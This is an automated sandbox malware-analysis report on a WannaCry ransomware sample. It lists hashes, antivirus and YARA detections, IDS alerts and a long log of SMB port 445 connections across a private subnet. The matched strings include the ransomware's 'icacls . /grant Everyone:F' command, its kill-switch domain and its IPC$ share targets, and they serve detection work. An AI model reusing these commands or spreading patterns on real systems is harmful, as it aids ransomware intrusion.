Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stN592INV6.exe

Overview

General Information

Sample Name:stN592INV6.exe
Original Sample Name:2023-05-07_31510bd9b6f5c297c64492ab86aacaa1_wannacry.exe
Analysis ID:860906
MD5:31510bd9b6f5c297c64492ab86aacaa1
SHA1:95f2b6d6fa1c48d71d2154270ba77aa3af74adc1
SHA256:011c24bce46c2ded7236482e0e36530dd27c937e31a0896e91659d9acd7ceb69
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many different private IPs (likely to spread or exploit)
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Connects to many different private IPs via SMB (likely to spread or exploit)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • stN592INV6.exe (PID: 7116 cmdline: C:\Users\user\Desktop\stN592INV6.exe MD5: 31510BD9B6F5C297C64492AB86AACAA1)
    • tasksche.exe (PID: 2396 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)
  • stN592INV6.exe (PID: 6052 cmdline: C:\Users\user\Desktop\stN592INV6.exe -m security MD5: 31510BD9B6F5C297C64492AB86AACAA1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
stN592INV6.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
stN592INV6.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
stN592INV6.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    stN592INV6.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    stN592INV6.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
    • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
    • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
      • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
      • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
      C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
      • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
      • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
          • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
          • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
          00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            1.2.stN592INV6.exe.1fe70a4.4.raw.unpackSUSP_Imphash_Mar23_2Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)Arnim Rupp (https://github.com/ruppde)
              1.2.stN592INV6.exe.1fdc084.5.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (with the help of binar.ly)
              • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
              • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
              • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
              1.2.stN592INV6.exe.25078e8.7.raw.unpackSUSP_Imphash_Mar23_2Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)Arnim Rupp (https://github.com/ruppde)
                1.2.stN592INV6.exe.24fc8c8.9.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (with the help of binar.ly)
                • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
                • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
                • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
                1.2.stN592INV6.exe.250b948.8.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (Nextron Systems) (with the help of binar.ly)
                • 0x32520:$x1: icacls . /grant Everyone:F /T /C /Q
                • 0x222ec:$x3: tasksche.exe
                • 0x324fc:$x3: tasksche.exe
                • 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA
                • 0x32550:$x5: WNcry@2ol7
                • 0x22357:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                • 0x82d0:$x7: mssecsvc.exe
                • 0x222c4:$x8: C:\%s\qeriuwjhrf
                • 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q
                • 0x82b8:$s1: C:\%s\%s
                • 0x222d8:$s1: C:\%s\%s
                • 0x32450:$s3: cmd.exe /c "%s"
                • 0x649a4:$s4: msg/m_portuguese.wnry
                • 0x1f60c:$s5: \\192.168.56.20\IPC$
                • 0xca01:$s6: \\172.16.99.5\IPC$
                • 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
                • 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
                • 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
                Click to see the 105 entries
                No Sigma rule has matched
                Timestamp:192.168.2.6104.16.173.8049705802024298 05/08/23-05:35:39.911846
                SID:2024298
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.849786532024291 05/08/23-05:35:39.859181
                SID:2024291
                Source Port:49786
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.68.8.8.859575532024291 05/08/23-05:35:38.893922
                SID:2024291
                Source Port:59575
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:104.16.173.80192.168.2.680497042031515 05/08/23-05:35:39.010206
                SID:2031515
                Source Port:80
                Destination Port:49704
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:104.16.173.80192.168.2.680497052031515 05/08/23-05:35:39.944324
                SID:2031515
                Source Port:80
                Destination Port:49705
                Protocol:TCP
                Classtype:Misc activity
                Timestamp:192.168.2.6104.16.173.8049704802024298 05/08/23-05:35:38.979066
                SID:2024298
                Source Port:49704
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: stN592INV6.exeReversingLabs: Detection: 100%
                Source: stN592INV6.exeAvira: detected
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwerURL Reputation: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&hAvira URL Cloud: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2hAvira URL Cloud: Label: malware
                Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/LAvira URL Cloud: Label: malware
                Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/AD.WannaCry.sewvt
                Source: C:\Windows\tasksche.exeReversingLabs: Detection: 97%
                Source: stN592INV6.exeJoe Sandbox ML: detected
                Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
                Source: 2.2.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 0.2.stN592INV6.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 0.0.stN592INV6.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.0.stN592INV6.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 0.2.stN592INV6.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 0.0.stN592INV6.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.2.stN592INV6.exe.24fc8c8.9.unpackAvira: Label: TR/Ransom.Gen
                Source: 1.0.stN592INV6.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 2.0.tasksche.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.2.stN592INV6.exe.7100a4.1.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.2.stN592INV6.exe.252e96c.6.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.2.stN592INV6.exe.1fdc084.5.unpackAvira: Label: TR/Ransom.Gen
                Source: 1.2.stN592INV6.exe.200e128.3.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: 1.2.stN592INV6.exe.400000.0.unpackAvira: Label: TR/AD.WannaCry.sewvt
                Source: C:\Windows\tasksche.exeCode function: 2_2_004018B9 CryptReleaseContext,2_2_004018B9

                Exploits

                barindex
                Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
